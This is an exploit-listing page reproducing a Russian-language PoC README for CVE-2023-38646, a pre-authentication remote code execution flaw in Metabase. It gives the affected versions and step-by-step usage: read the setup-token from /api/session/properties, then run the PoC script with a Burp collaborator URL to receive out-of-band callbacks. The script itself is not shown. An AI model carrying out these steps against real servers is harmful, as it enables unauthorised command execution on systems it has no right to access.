Sploitus

Exploit for CVE-2023-38646-PoC

kitploit · 2026-08-27

Exploit Code

MARKDOWN18 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SHAMO0-CVE-2023-38646-POC
# CVE-2023-38646 - Metabase: RCE до аутентификации

![Untitled presentation](https://assets.kitploit.com/production/public/readmes/32283/b48470ae0e32bd82fdaaa7bb7871ea7c5624033921a5bfcc1799b0ccb4a725fe.png)

Metabase open source до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере с уровнем привилегий сервера. Для эксплуатации аутентификация не требуется. Другие исправленные версии: 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 и 1.43.7.2.

## Шаги PoC

  1. Перейдите по адресу `http://vulnerablehost.com/api/session/properties`
  2. Найдите "setup-token" ![ddddd](https://assets.kitploit.com/production/public/readmes/32283/bba3bc326f139e3175f9a46475657471b1154ad84f570164c6c5c4e4dba56831.png)
  3. Получите URL коллаборатора (протестировано с BurpSuite)
  4. Запустите скрипт PoC с параметрами: 
     * `-u` \- URL цели
     * `-t` \- Токен установки
     * `-c` \- URL коллаборатора
     * `python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>`
  5. Проверьте свой коллаборатор на наличие обратных вызовов